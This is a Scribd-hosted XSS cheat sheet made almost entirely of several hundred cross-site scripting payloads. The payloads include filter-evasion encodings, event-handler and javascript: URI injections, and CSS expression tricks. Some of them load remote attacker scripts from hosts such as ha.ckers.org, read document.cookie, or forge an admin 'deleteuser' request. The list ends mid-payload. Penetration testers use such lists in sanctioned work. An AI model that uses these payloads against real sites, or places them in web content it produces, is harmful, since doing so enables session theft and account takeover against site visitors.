Scribd
Upload
125 views

XSS Cheat

The document contains numerous examples of potential XSS (cross-site scripting) vulnerabilities through the use of malicious JavaScript code embedded in various HTML elements, attributes, and encoding techniques. The goal is to execute arbitrary JavaScript in a user's browser by exploiting vulnerabilities on websites.

Uploaded by

joseph
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
125 views

XSS Cheat

The document contains numerous examples of potential XSS (cross-site scripting) vulnerabilities through the use of malicious JavaScript code embedded in various HTML elements, attributes, and encoding techniques. The goal is to execute arbitrary JavaScript in a user's browser by exploiting vulnerabilities on websites.

Uploaded by

joseph
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 9

<body oninput=javascript:alert(1)><input autofocus> <math

href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction


actiontype="statusline#http://google.com"
xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> <frameset
onload=javascript:alert(1)> <table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//"> <comment><img
src="</comment><img src=x onerror=javascript:alert(1))//"> <![><img src="]><img
src=x onerror=javascript:alert(1)//"> <style><img src="</style><img src=x
onerror=javascript:alert(1)//"> <li style=list-style:url()
onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%
%3E);visibility:hidden onload=javascript:alert(1)></div> <head><base
href="javascript://"></head><body><a href="/.
/,javascript:alert(1)//#">XXX</a></body> <SCRIPT FOR=document
EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> <OBJECT
CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="javascript:alert(1)"></OBJECT> <object data="data:text/html;base64,%
(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b
<script>alert(1)</script>0 <div id="div1"><input
value="``onmouseover=javascript:alert(1)"></div> <div
id="div2"></div><script>document.getElementById("div2").innerHTML =
document.getElementById("div1").innerHTML;</script> <x '="foo"><x foo='><img src=x
onerror=javascript:alert(1)//'> <embed src="javascript:alert(1)"> <img
src="javascript:alert(1)"> <image src="javascript:alert(1)"> <script
src="javascript:alert(1)"> <div style=width:1px;filter:glow
onfilterchange=javascript:alert(1)>x <?
foo="><script>javascript:alert(1)</script>"> <!
foo="><script>javascript:alert(1)</script>"> </
foo="><script>javascript:alert(1)</script>"> <? foo="><x foo='?
><script>javascript:alert(1)</script>'>"> <! foo="[[[Inception]]"><x
foo="]foo><script>javascript:alert(1)</script>"> <% foo><x
foo="%><script>javascript:alert(1)</script>"> <div id=d><x xmlns="><iframe
onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> <img
\x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img
\x11src=x onerror="javascript:alert(1)"> <img \x12src=x
onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x
onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x
onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x
onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img
src\x09=x onerror="javascript:alert(1)"> <img src\x10=x
onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img
src\x32=x onerror="javascript:alert(1)"> <img src\x12=x
onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img
src\x00=x onerror="javascript:alert(1)"> <img src\x47=x
onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img
src=x\x10onerror="javascript:alert(1)"> <img
src=x\x11onerror="javascript:alert(1)"> <img
src=x\x12onerror="javascript:alert(1)"> <img
src=x\x13onerror="javascript:alert(1)"> <img[a][b]
[c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)"> <img src=x
onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)"> <img src=x
onerror=\x00"javascript:alert(1)"> <a
href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> <img
src="x` `<script>javascript:alert(1)</script>"` `> <img src onerror /" '"=
alt=javascript:alert(1)//"> <title
onpropertychange=javascript:alert(1)></title><title title=> <a
href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x
onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> --> <script src="/\%
(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x"
classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object
classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param
name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(1)';-
o-link-source:current">X <style>p[foo=bar{}*{-o-
link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]
{color:red};</style> <link rel=stylesheet href=data:,*
%7bx:expression(javascript:alert(1))%7d <style>@import "data:,*
%7bx:expression(javascript:alert(1))%7D";</style> <a style="pointer-
events:none;position:absolute;"><a style="position:absolute;"
onclick="javascript:alert(1);">XXX</a></a><a
href="javascript:javascript:alert(1)">XXX</a> <style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo&#10;;color:red;';">XXX <div style="font-
family:foo}color=red;">XXX <// style=x:expression\28javascript:alert(1)\29>
<style>*{x:expression(javascript:alert(1))}</style> <div style=content:url(%
(svg)s)></div> <div style="list-
style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X <div id=d><div
style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script> <div
style="background:url(/https/www.scribd.com/f#&#127;oo/;color:red/*/foo.jpg);">X <div style="font-
family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X <div
id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{}
</style> <x style="background:url('x&#1;;color:red;/*')">XXX</x> <script>({set/**/$
($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{javascript:alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}]
[0].constructor._('javascript:alert(1)')()</script> <meta charset="x-imap4-
modified-
utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlA
HIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-
utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-
farsi">¼script¾javascript:alert(1)¼/script¾ X<x
style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time`
style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml`
to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> <IMG
SRC="jav&#x0D;ascript:alert('XSS');"> perl -e 'print "<IMG
SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14;
javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe
src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE"
SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG
DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li
{list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG
SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY
ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR
SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link"
Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-
binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG
STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE
TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-
image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS
STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET> <TABLE
BACKGROUND="javascript:alert('XSS')"> <TABLE><TD
BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image:
url(javascript:alert('XSS'))"> <DIV STYLE="background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\
0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV
STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width:
expression(alert('XSS'));"> <BASE HREF="javascript:alert('XSS');//"> <OBJECT
TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED
SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED> <SCRIPT
SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--
><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <?
echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG
SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-
EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META
HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-
SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">"
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">"
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" ''
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'"
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>`
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A
HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6
6.000146.0x7.147/">XSS</A> <iframe src="&Tab;javascript:prompt(1)&Tab;">
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt
>alert&lpar;1&rpar; {Opera} <img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)" <img src=``&NewLine;
onerror=alert(1)&NewLine; <script/&Tab;
src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-
0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
&#34;&#62;<h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg
&#111;&#110;load=alert(1)>"> <meta content="&NewLine; 1 &NewLine;;
JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script
xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script
x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh"
content="0;url=javascript:confirm(1)"> <iframe
src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a
href="javascript:\u0061lert&#x28;1&#x29;">X
</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'
> <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> <form><iframe &#09;&#10;&#11;
src="javascript&#58;alert(1)"&#11;&#10;&#09;;> <a href="data:application/x-x509-
user-
cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>
X</a http://www.google<script .com>alert(document.location)</script
<a&#32;href&#61;&#91;&#00;&#93;"&#00;
onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror =
prompt('&#49;') <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;<script
^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-
(>/**/alert(document.location)/**/</script &#32; :-( &#00;</form><input
type&#61;"date" onfocus="alert(1)"> <form><textarea &#13;
onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> <script
/***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script
/***/ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a
href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;!--
&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F
onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg'
onmouseover=&Tab;prompt(1) &#34;&#62;<svg><style>{-o-link-
source&colon;'<body/onload=confirm(1)>' &#13;<blink/&#13;
onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee
onstart='javascript:alert&#x28;1&#x29;'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7} <iframe//
src=javaSCRIPT&colon;alert(1)
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=
'submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1)
/*iframe/src*/> //|\\ <script //|\\
src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</styl
e> <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script
'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a
href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div
onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe
style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed
src="http://corkami.googlecode.com/svn/!
svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object
data="http://corkami.googlecode.com/svn/!
svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On
Mouse Over</var> <a
href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img
src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload =
prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input
value=<><iframe/src=javascript:confirm(1) <input type="text" value=``
<div/onmouseover='alert(1)'>X</div> <iframe
src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;
r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object
type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-
equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a
xlink:href="//jsfiddle.net/t846h/">click <embed
code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg
contentScriptType=text/vbs><script>MsgBox+1 <a
href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.
\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text
%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C
%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script> <body/onload=&lt;!--&gt;&#10alert(1)> <script
itworksinallbrowsers>/*<script* */alert(1)</script <img src ?
itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script
</svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa
aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe <script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x0000
70&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> <div
style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x
onerror=window.open('https://www.google.com/');> <form><button
formaction=javascript&colon;alert(1)>CLICKME <math><a
xlink:href="//jsfiddle.net/t846h/">click <object
data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe
src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F
%73%63%72%69%70%74%3E"></iframe> <a
href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61
&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#1
05&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#1
15&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> '';!--"<XSS>=&{()}
'>//\\,<'>">">"*" '); alert('XSS <script>alert(1);</script>
<script>alert('XSS');</script> <IMG SRC="javascript:alert('XSS');"> <IMG
SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG
SRC=javascript:alert(&quot;XSS&quot;)> <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png
onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <?
echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee> <IMG
SRC=\"jav&#x09;ascript:alert('XSS');\"> <IMG
SRC=\"jav&#x0A;ascript:alert('XSS');\"> <IMG
SRC=\"jav&#x0D;ascript:alert('XSS');\"> <IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG
LOWSRC=\"javascript:alert('XSS')\"> <IMG DYNSRC=\"javascript:alert('XSS')\"> <font
style='color:expression(alert(document.cookie))'> <img
src="javascript:alert('XSS')"> <script language="JavaScript">alert('XSS')</script>
<body onunload="javascript:alert('XSS');"> <body onLoad="alert('XSS');" [color=red'
onmouseover="alert('xss')"]mouse over[/color] "/></a></><img src=1.gif
onerror=alert(1)> window.alert("Bonjour !"); <div
style="x:expression((window.r==1)?'':eval('r=1;
alert(String.fromCharCode(88,83,83));'))"> <iframe<?php echo chr(11)?>
onload=alert('XSS')></iframe> "><script
alert(String.fromCharCode(88,83,83))</script> '>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script> '">><marquee><h1>XSS</h1></marquee> <META HTTP-
EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-
EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <?
='<SCRIPT>alert("XSS")</SCRIPT>'?> <IMG SRC='vbscript:msgbox(\"XSS\")'> "
onfocus=alert(document.domain) "> <" <FRAMESET><FRAME
SRC=\"javascript:alert('XSS');\"></FRAMESET> <STYLE>li {list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS perl -e
'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG
SRC=java\0script:alert(\"XSS\")>\";' > out <br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt> </br style=a:expression(alert())>
</script><script>alert(1)</script> "><BODY onload!#$%&()*~+-_.,:;?
@[/|\]^`=alert("XSS")> [color=red width=expression(alert(123))][color] <BASE
HREF="javascript:alert('XSS');//"> Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script> <body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script> '""><script
language="JavaScript"> alert('X \nS \nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script> <INPUT TYPE="IMAGE"
SRC="javascript:alert('XSS');"> '></select><script>alert(123)</script> '>"><script
src = 'http://www.site.com/XSS.js'></script> }
</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='><script>alert("xss")</script> <script+src=">"+src="http://yoursite.com/xss.js?
69,69"></script> <body
background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
">/XaDoS/><script>alert(document.cookie)</script><script
src="http://www.site.com/XSS.js"></script> ">/KinG-
InFeT.NeT/><script>alert(document.cookie)</script>
src="http://www.site.com/XSS.js"></script> data:text/html;charset=utf-
7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--"
/><script>alert('xss');</script> <script>alert("XSS by
\nxss")</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert("XSS by
\nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by
xss</h1></marquee> <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS
by xss</h1></marquee> <script>alert(1337)</script><marquee><h1>XSS by
xss</h1></marquee> "><script>alert(1337)</script>"><script>alert("XSS by
\nxss</h1></marquee> '"></title><script>alert(1337)</script>><marquee><h1>XSS by
xss</h1></marquee> <iframe src="javascript:alert('XSS by
\nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=""
alt=" \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
http://www.simpatie.ro/index.php?
page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? ');
alert('xss'); var x=' \\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); >"><ScRiPt%20%0a
%0d>alert(561177485777)%3B</ScRiPt> <img src="Mario Heiderich says that svg SHOULD
not be executed trough image tags"
onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002
0\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u00
67\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0
065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u
0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\
u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d
\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u006
9\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u00
